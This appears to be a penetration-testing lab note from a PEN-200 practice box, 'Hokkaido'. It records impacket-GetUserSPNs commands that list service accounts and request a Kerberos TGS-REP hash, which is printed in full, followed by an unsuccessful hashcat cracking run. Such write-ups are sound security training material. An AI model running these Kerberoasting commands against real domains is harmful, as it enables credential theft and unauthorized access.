InfoSec LAB

Hokkaido_Kerberoasting

Created: 2 min read

Kerberoasting

Kerberoast-able accounts have been identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-GetUserSPNs HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -dc-host dc.hokkaido-aerospace.com 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName                   Name         MemberOf                                           PasswordLastSet             LastLogon                   Delegation 
-------------------------------------  -----------  -------------------------------------------------  --------------------------  --------------------------  ----------
discover/dc.hokkaido-aerospace.com     discovery    CN=services,CN=Users,DC=hokkaido-aerospace,DC=com  2023-12-06 16:42:56.221832  2025-04-25 15:37:13.715478             
maintenance/dc.hokkaido-aerospace.com  maintenance  CN=services,CN=Users,DC=hokkaido-aerospace,DC=com  2023-11-25 14:39:04.869703  <never>

The discover account has already been compromised, leaving the maintenance account a valid target.

maintenance User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-GetUserSPNs HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -dc-host dc.hokkaido-aerospace.com -request-user maintenance
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName                   Name         MemberOf                                           PasswordLastSet             LastLogon  Delegation 
-------------------------------------  -----------  -------------------------------------------------  --------------------------  ---------  ----------
maintenance/dc.hokkaido-aerospace.com  maintenance  CN=services,CN=Users,DC=hokkaido-aerospace,DC=com  2023-11-25 14:39:04.869703  <never>               
 
 
 
$krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$HOKKAIDO-AEROSPACE.COM/maintenance*$7c9815451356105c41b2b103dc4af8f9$d73accfab62751c11f521ced2dc902be106d13654e8033113b93df5d80f9321796fa46a559ad3104dcc92d267a3cc53bcac7041dee3df35d44a80fcd8fcdd98954dfd3b730ec468dd848b086ccb503d78295573f8b367070040282a70d9015921808102ec2da272a3db5d20749552ef9a6a05073cb4653cb72248b39ae5ab68bc0370793f210d8caa9cd64b674c174af0e2fda38c5c35b4915daced3a5665f9f556bcef38a4fb75cf0183519da5b1630624f06de988dcff8ace85a74ab2acb41c11f62012ffcd59836d3811777cb5c0bea6781d0eaea5a4a48494bf54dd4b92c5567cd87eb4570dad08b7fa63d9360a36257c8f21f8084fdf409eee6577b763631f252104fbb76bdfba02dc435d84139ffaf03896692d7dfea1cce446c12ca58e8490d8344059092da0c935c4e06976c373f2f65e7babe1a523081f32e96c4986fd6cf9ce8640736775b51e42d57217e3f4f67a4c989b9e5779a8b82382586f6ec24ff9728463b00ba1d1af32cac55c92c3fa6fb0569909d11ab25f4d73706e1c8a03e793a997c2ae1dc09196fe59f96228d43689c692cfc0e5c9ae4d712a52edd47198d049281a300976783b5c51050b9890a46a1f063f7744537e0c87aa3d8ba391a4d63c2006320227707b9a68f2c25dcd4c92ed7345388c01e3a2e0fb117e6d8d0d973814ae60ae138f3e16c0254e84564d0ad97ffe8c21499653de1aaa71b8e650ce57b6f3fd4e8544ffdbb87d2d82ed00515da8aedf57cf619d3650d94eff4b740ac73cee00bea75b4c28b22b405c68aefabc3682cc5a379c5fc3988525b17dd3c247ba5f8307e9d48fc4516c32eca31509fa4f9ff97db557e144e22446d837fff433cc4ebe9b733c4f192fdcf4c1397846b611414022d7b730bb81e38260ed846e59a738456b849f0fde23d8dbfae18eac17b8e4ca09228206e57f29b13358fadff2d9a9e1736d47006ecd9ff8c233fd59ff979d0b51d91e73a54a8b0d748683fb76766579a984e9c828261f7c25aaf4053b37eaf632e9bdb6027cc4279beff3835aae6704a8849f1e9481ab9f2ca39e6d8b19f63a0017d390cec0fcc11f7987e71a24b9b949b38f587306ce9352c955185e9c5a8fa2fa541ddd41f80004b10f79c9735f4eaeafc97b4f584351ef86e6a3bb9115d8463983c829beca0a5bac9b68864a930d0093cac5059356ae987478048b9f744e69ee071960f9c71e458d12f6a710116d796fb312ff544d67f8e3168005ee44c830cc161399cdc1278feab065266aa0fcd7a3afc5bfe0c7a378f8ec85a6ad37d64320cb8d069e23198e45ef0e706dbe67b9fda33164a60152a58e00230f0a2e8e8889d29cb0edee5a8685d3e5f5f62038bf7238255cd26333c495a70033dc427547a1aa85a0ad071642a0af081d97479e470a0bb1821fc28eff555dc590381ee6ec49d9eeee9e89ed7ecff8cfdd5bea9c0819fd702cf6760f98cca8f5bd25434df7f38

Kerberoasting the maintenance account. TGS-REP returned.

Password Cracking (Fail)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ hashcat -a 0 -m 13100 maintenance.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 1104517645
 
Approaching final keyspace - workload adjusted.           
 
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$HOK...993ef9
Time.Started.....: Fri Apr 25 15:59:33 2025, (3 mins, 22 secs)
Time.Estimated...: Fri Apr 25 16:02:55 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5589.1 kH/s (6.77ms) @ Accel:128 Loops:38 Thr:1 Vec:16
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1104517645/1104517645 (100.00%)
Rejected.........: 0/1104517645 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:76-77 Iteration:0-38
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2179616e6765] -> $HEX[04a156616d6f]
Hardware.Mon.#1..: Util: 80%
 
Started: Fri Apr 25 15:59:32 2025
Stopped: Fri Apr 25 16:02:55 2025

hashcat was UNABLE to crack the TGS-REP hash

Interactive Graph View

Backlinks